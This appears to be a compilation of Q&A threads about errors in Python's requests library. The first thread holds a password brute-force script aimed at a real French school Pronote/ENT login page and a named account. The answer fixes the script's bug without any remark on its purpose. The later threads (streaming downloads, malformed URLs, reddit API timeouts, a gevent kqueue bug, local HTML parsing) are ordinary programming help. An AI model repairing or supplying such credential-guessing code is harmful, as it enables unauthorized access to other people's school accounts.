Failed to parse: <Response [200]>

Please help me, I don't know how to use requests. This is the code:
import requests
url = requests.get("https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html")
arq = open('word.txt','r').readlines()
for line in arq:
    password = line.strip()
    http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
    content = http.content
    if "Identifiant ou mot de passe incorrect" in content:
        print("[-]Invalide : "+password)
    else:
        print("================== [+] MOT DE PASSE CRACKÉ : "+password+"===========")
        break
and I got this:
Traceback (most recent call last):
  File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 382, in prepare_url
    scheme, auth, host, port, path, query, fragment = parse_url(url)
  File "F:\Program Files (x86)\py\lib\site-packages\urllib3\util\url.py", line 394, in parse_url
    return six.raise_from(LocationParseError(source_url), None)
  File "<string>", line 3, in raise_from
urllib3.exceptions.LocationParseError: Failed to parse: <Response [200]>

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "F:/Program Files (x86)/py/Hack pronote/Pronote v3/Pronote.py", line 8, in <module>
    http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
  File "F:\Program Files (x86)\py\lib\site-packages\requests\api.py", line 119, in post
    return request('post', url, data=data, json=json, **kwargs)
  File "F:\Program Files (x86)\py\lib\site-packages\requests\api.py", line 61, in request
    return session.request(method=method, url=url, **kwargs)
  File "F:\Program Files (x86)\py\lib\site-packages\requests\sessions.py", line 528, in request
    prep = self.prepare_request(req)
  File "F:\Program Files (x86)\py\lib\site-packages\requests\sessions.py", line 456, in prepare_request
    p.prepare(
  File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 316, in prepare
    self.prepare_url(url, params)
  File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 384, in prepare_url
    raise InvalidURL(*e.args)
requests.exceptions.InvalidURL: Failed to parse: <Response [200]>

As @Iarsks said, this is a problem where you're trying to use the url variable as a URL, but url is not a string: it's a Response object returned by requests.get(). It seems you're trying to "declare" the URL by making a request, which isn't needed. To simplify, you only need the URL string, like this:
url = "https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html"
without the requests.get() call.
To understand this library better: the two most commonly used request methods are GET and POST. There are more, but for the sake of this answer I'll only talk about these two. GET is for retrieving information from a website, for example a JSON file from an API; POST is for sending or saving new data to an API or web page.
In any case, I would recommend reading about the basics of requests and how the backend handles them, so you understand how it all works before starting to use requests on your own.
If I understood your problem correctly, the following code should fix it:
import requests
url = "https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html"
arq = open('word.txt','r').readlines()
for line in arq:
    password = line.strip()
    http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
    content = http.content
    if "Identifiant ou mot de passe incorrect" in content:
        print("[-]Invalide : "+password)
    else:
        print("================== [+] MOT DE PASSE CRACKÉ : "+password+"===========")
        break

Related

Python Requests OS Error 104 Connection Broken Error

Hi, I am trying to hit an API using the requests module of Python. The API has to be hit 20000 times, as there are around 20000 pages. Each hit returns about 10 MB of data, and by the end of the process the code produces a JSON file of around 100 GB. Here is the code I have written:
with open('file.json','wb',buffering=100*1048567) as f:
    while(next_page_cursor != ""):
        with request.get(url,headers=headers) as response:
            json_response = json.loads(response.content.decode('utf-8'))
            """
            json response looks something like this
            {
              content: [{}, {}, {} ........ 50 dictionaries],
              next_page_cursor: "abcd"
            }
            """
            next_page_cursor = json_response['next_page_cursor']
            for data in json_response['content']:
                f.write((json.dumps(data) + "\n").encode())
But after running successfully for a few pages, the code fails with the error below:
Traceback (most recent call last):
File "<command-1206920060120926>", line 65, in <module>
with requests.get(data_url, headers = headers) as response:
File "/databricks/python/lib/python3.7/site-packages/requests/api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/sessions.py", line 533, in request
resp = self.send(prep, **send_kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/sessions.py", line 686, in send
r.content
File "/databricks/python/lib/python3.7/site-packages/requests/models.py", line 828, in content
self._content = b''.join(self.iter_content(CONTENT_CHUNK_SIZE)) or b''
File "/databricks/python/lib/python3.7/site-packages/requests/models.py", line 753, in generate
raise ChunkedEncodingError(e)
requests.exceptions.ChunkedEncodingError: ('Connection broken: OSError("(104, \'ECONNRESET\')")', OSError("(104, 'ECONNRESET')"))
You need to use response.iter_content together with stream=True, so the response body is consumed in chunks instead of being loaded into memory in one piece:
https://2.python-requests.org/en/master/api/#requests.Response.iter_content
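To sketch what that looks like: with stream=True the body is not downloaded up front, and iter_content then yields it in fixed-size pieces that can be written straight to disk, so a 10 MB page never has to sit in memory whole. The url, headers, and chunk size below are placeholders, not the asker's actual values:

```python
import requests

def stream_to_file(url, headers, out_path, chunk_size=1024 * 1024):
    # stream=True defers the download; iter_content then yields the body
    # in chunk_size pieces instead of materialising it all at once
    with requests.get(url, headers=headers, stream=True, timeout=60) as response:
        response.raise_for_status()
        with open(out_path, 'ab') as f:
            for chunk in response.iter_content(chunk_size=chunk_size):
                if chunk:  # skip keep-alive heartbeats
                    f.write(chunk)
```

Note that the paging loop still needs each page parsed (e.g. via response.json()) to read next_page_cursor; iter_content only changes how the raw bytes are consumed.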

Download with Python from URL gives No Host Supplied error

I am trying to make an app that downloads comics, but whenever I try to download an image it says no host supplied.
I really searched and found nothing.
This is the code:
import requests,bs4
url='https://www.marvel.com/comics/issue/71314/edge_of_spider-geddon_2018_1'
res=requests.get(url,stream=True)
res.raise_for_status()
soup=bs4.BeautifulSoup(res.text)
elem=soup.select('div[class="row-item-image"] img')#.viewer-cnt .row .col-xs-12 #ppp img')
#print(elem)
comicurl='https:'+elem[0].get('src')
res=requests.get(comicurl,stream=True,allow_redirects=True)
res.raise_for_status()
with open(comicurl[comicurl.rfind('/')+1:],'wb') as i:
    for chunk in res.iter_content(100000):
        i.write(chunk)
I expect it to download the image, but it gives me this error:
Traceback (most recent call last):
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\comicdownloader.py", line 10, in <module>
res=requests.get(comicurl,stream=True,allow_redirects=True)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\sessions.py", line 519, in request
prep = self.prepare_request(req)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\sessions.py", line 462, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\models.py", line 313, in prepare
self.prepare_url(url, params)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\models.py", line 390, in prepare_url
raise InvalidURL("Invalid URL %r: No host supplied" % url)
requests.exceptions.InvalidURL: Invalid URL 'https:https://i.annihil.us/u/prod/marvel/i/mg/6/b0/5b6c5e4154f75/portrait_uncanny.jpg': No host supplied
And it gives me this error whenever I try it on any website.
It looks like elem[0].get('src') already evaluates to https://i.annihil.us/u/prod/marvel/i/mg/6/b0/5b6c5e4154f75/portrait_uncanny.jpg.
So on the line comicurl='https:'+elem[0].get('src') you prepend https: to an already well-formed URL, making it invalid.
Can't argue with this: Invalid URL 'https:https://i.annihil.us/u/prod -- the URL really is invalid. You should get rid of the 'https:' prefix in the following statement:
comicurl='https:'+elem[0].get('src')
i.e. use comicurl = elem[0].get('src') instead.
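A more general fix than dropping the prefix is urllib.parse.urljoin, which leaves an already-absolute src untouched and resolves protocol-relative (//host/...) or relative paths against the page URL. A small sketch, reusing the URLs from the question (the //i.annihil.us/img.jpg example is hypothetical):

```python
from urllib.parse import urljoin  # Python 3; on Python 2 this lives in urlparse

page_url = 'https://www.marvel.com/comics/issue/71314/edge_of_spider-geddon_2018_1'
src = 'https://i.annihil.us/u/prod/marvel/i/mg/6/b0/5b6c5e4154f75/portrait_uncanny.jpg'

# src is already absolute, so urljoin returns it unchanged
comicurl = urljoin(page_url, src)
print(comicurl == src)  # True

# A protocol-relative src would pick up the page's scheme instead
print(urljoin(page_url, '//i.annihil.us/img.jpg'))  # https://i.annihil.us/img.jpg
```

This way the same code works whether the site serves absolute, protocol-relative, or relative image paths.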

reddit API praw error HTTP request or JSON object

I use the reddit API wrappers praw and psraw to extract comments from a subreddit; however, I got two errors today after running a few loops:
JSON object decode error or empty object (ValueError) -- even though I catch the exception in my code, it still doesn't work.
HTTP request read timeout.
Example:
Traceback (most recent call last):
File "C:/Users/.../subreddit psraw.py", line 20, in <module>
for comment in submission.comments:
File "C:\Python27\lib\site-packages\praw\models\reddit\base.py", line 31, in __getattr__
self._fetch()
File "C:\Python27\lib\site-packages\praw\models\reddit\submission.py", line 142, in _fetch
'sort': self.comment_sort})
File "C:\Python27\lib\site-packages\praw\reddit.py", line 367, in get
data = self.request('GET', path, params=params)
File "C:\Python27\lib\site-packages\praw\reddit.py", line 451, in request
params=params)
File "C:\Python27\lib\site-packages\prawcore\sessions.py", line 174, in request
params=params, url=url)
File "C:\Python27\lib\site-packages\prawcore\sessions.py", line 108, in _request_with_retries
data, files, json, method, params, retries, url)
File "C:\Python27\lib\site-packages\prawcore\sessions.py", line 93, in _make_request
params=params)
File "C:\Python27\lib\site-packages\prawcore\rate_limit.py", line 33, in call
response = request_function(*args, **kwargs)
File "C:\Python27\lib\site-packages\prawcore\requestor.py", line 49, in request
raise RequestException(exc, args, kwargs)
prawcore.exceptions.RequestException: error with request
HTTPSConnectionPool(host='oauth.reddit.com', port=443): Read timed out. (read timeout=16.0)
Since a subreddit can contain 10k+ comments, is there a way to solve this issue? Or is it because the reddit website has some problems today?
My code:
import praw, datetime, os, psraw
reddit = praw.Reddit('bot1')
subreddit = reddit.subreddit('example')
for submission in psraw.submission_search(reddit, subreddit='example', limit=1000000):
    try:
        #get comments
        for comment in submission.comments:
            subid = submission.id
            comid = comment.id
            com_body = comment.body.encode('utf-8').replace("\n", " ")
            com_date = datetime.datetime.utcfromtimestamp(comment.created_utc)
            string_com = '"{0}", "{1}", "{2}"\n'
            formatted_string_com = string_com.format(comid, com_body, com_date)
            indexFile_comment = open('path' + subid + '.txt', 'a+')
            indexFile_comment.write(formatted_string_com)
    except ValueError:
        print ("error")
        pass
        continue
    except AttributeError:
        print ("error")
        pass
        continue
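The Read timed out in the traceback is a transient network failure, which the except ValueError above will never catch. One common approach (a generic sketch, not praw's own API) is to wrap the flaky call in a retry loop with exponential backoff; with praw you would catch prawcore.exceptions.RequestException, shown in the traceback, instead of the bare Exception used here:

```python
import time

def fetch_with_retries(fetch, attempts=3, backoff=2.0):
    """Call fetch(), retrying on failure with exponential backoff.

    fetch is any zero-argument callable, e.g.
    lambda: list(submission.comments) in the code above.
    """
    for attempt in range(attempts):
        try:
            return fetch()
        except Exception:  # with praw: prawcore.exceptions.RequestException
            if attempt == attempts - 1:
                raise  # out of retries; let the caller see the error
            time.sleep(backoff * (2 ** attempt))
```

For occasional timeouts on large subreddits, retrying the fetch (and keeping the file writing outside the retried call) is usually enough.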

Sending POST requests in a for range loop using requests.Session() raises 'module' object has no attribute 'kqueue'

macOS 10.12.3, Python 2.7.13, requests 2.13.0.
I use the requests package to send POST requests. The request needs a login before posting data, so I use requests.Session() and load a cookie saved from an earlier login.
Then I use this session to send POST data in a loop.
This code used to run without errors on Windows and Linux.
Simple code:
s = request.Session()
s.cookies = cookieslib.LWPCookieJar('cookise')
s.cookies.load(ignore_discard=True)
for user_id in range(100,200):
    url = 'http://xxxx'
    data = { 'user': user_id, 'content': '123'}
    r = s.post(url, data)
    ...
But the program frequently crashes (at roughly every interval) with the error AttributeError: 'module' object has no attribute 'kqueue':
Traceback (most recent call last):
File "/Users/gasxia/Dev/Projects/TgbookSpider/kfz_send_msg.py", line 90, in send_msg
r = requests.post(url, data) # catch error if user isn't exist
File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 535, in post
return self.request('POST', url, data=data, json=json, **kwargs)
File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/site-packages/requests/adapters.py", line 423, in send
timeout=timeout
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/connectionpool.py", line 588, in urlopen
conn = self._get_conn(timeout=pool_timeout)
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/connectionpool.py", line 241, in _get_conn
if conn and is_connection_dropped(conn):
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/util/connection.py", line 27, in is_connection_dropped
return bool(wait_for_read(sock, timeout=0.0))
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/util/wait.py", line 33, in wait_for_read
return _wait_for_io_events(socks, EVENT_READ, timeout)
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/util/wait.py", line 22, in _wait_for_io_events
with DefaultSelector() as selector:
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/util/selectors.py", line 431, in __init__
self._kqueue = select.kqueue()
AttributeError: 'module' object has no attribute 'kqueue'
This looks like a problem that commonly arises if you're using something like eventlet or gevent, both of which monkeypatch the select module. If you're using those to achieve asynchrony, you will need to ensure that those monkeypatches are applied before importing requests. This is a known bug, being tracked in this issue.

How do I use Python and lxml to parse a local html file?

I am working with a local HTML file in Python, and I am trying to use lxml to parse it. For some reason I can't get the file to load properly, and I'm not sure whether this has to do with not having an HTTP server set up on my local machine, with my etree usage, or with something else.
My reference for this code was this: http://docs.python-guide.org/en/latest/scenarios/scrape/
This could be a related problem: Requests : No connection adapters were found for, error in Python3
Here is my code:
from lxml import html
import requests
page = requests.get('C:\Users\...\sites\site_1.html')
tree = html.fromstring(page.text)
test = tree.xpath('//html/body/form/div[3]/div[3]/div[2]/div[2]/div/div[2]/div[2]/p[1]/strong/text()')
print test
The traceback that I'm getting reads:
C:\Python27\python.exe "C:/Users/.../extract_html/extract.py"
Traceback (most recent call last):
File "C:/Users/.../extract_html/extract.py", line 4, in <module>
page = requests.get('C:\Users\...\sites\site_1.html')
File "C:\Python27\lib\site-packages\requests\api.py", line 69, in get
return request('get', url, params=params, **kwargs)
File "C:\Python27\lib\site-packages\requests\api.py", line 50, in request
response = session.request(method=method, url=url, **kwargs)
File "C:\Python27\lib\site-packages\requests\sessions.py", line 465, in request
resp = self.send(prep, **send_kwargs)
File "C:\Python27\lib\site-packages\requests\sessions.py", line 567, in send
adapter = self.get_adapter(url=request.url)
File "C:\Python27\lib\site-packages\requests\sessions.py", line 641, in get_adapter
raise InvalidSchema("No connection adapters were found for '%s'" % url)
requests.exceptions.InvalidSchema: No connection adapters were found for 'C:\Users\...\sites\site_1.html'
Process finished with exit code 1
You can see that it has something to do with a "connection adapter" but I'm not sure what that means.
If the file is local, you shouldn't be using requests -- just open the file and read it in. requests expects to be talking to a web server.
with open(r'C:\Users\...site_1.html', "r") as f:
    page = f.read()
tree = html.fromstring(page)
There is a better way to do it: use the parse function instead of fromstring, which reads the file for you:
tree = html.parse(r"C:\Users\...site_1.html")
print(html.tostring(tree))
You can also try using Beautiful Soup
from bs4 import BeautifulSoup
f = open("filepath", encoding="utf8")
soup = BeautifulSoup(f)
f.close()
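As a self-contained illustration of the lxml approach, the snippet below writes a small stand-in for site_1.html to a temporary file and parses it locally; the file content and XPath are hypothetical, but the point is that no HTTP request (and no requests import) is involved:

```python
import os
import tempfile
from lxml import html

# Create a tiny stand-in for the local HTML file
doc = '<html><body><p><strong>local parse works</strong></p></body></html>'
fd, path = tempfile.mkstemp(suffix='.html')
with os.fdopen(fd, 'w') as f:
    f.write(doc)

tree = html.parse(path)  # lxml reads the file directly from disk
result = tree.xpath('//strong/text()')
print(result)  # ['local parse works']

os.remove(path)
```

requests only speaks URL schemes like http:// and https://; a filesystem path has no connection adapter, which is exactly what the InvalidSchema error was saying.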
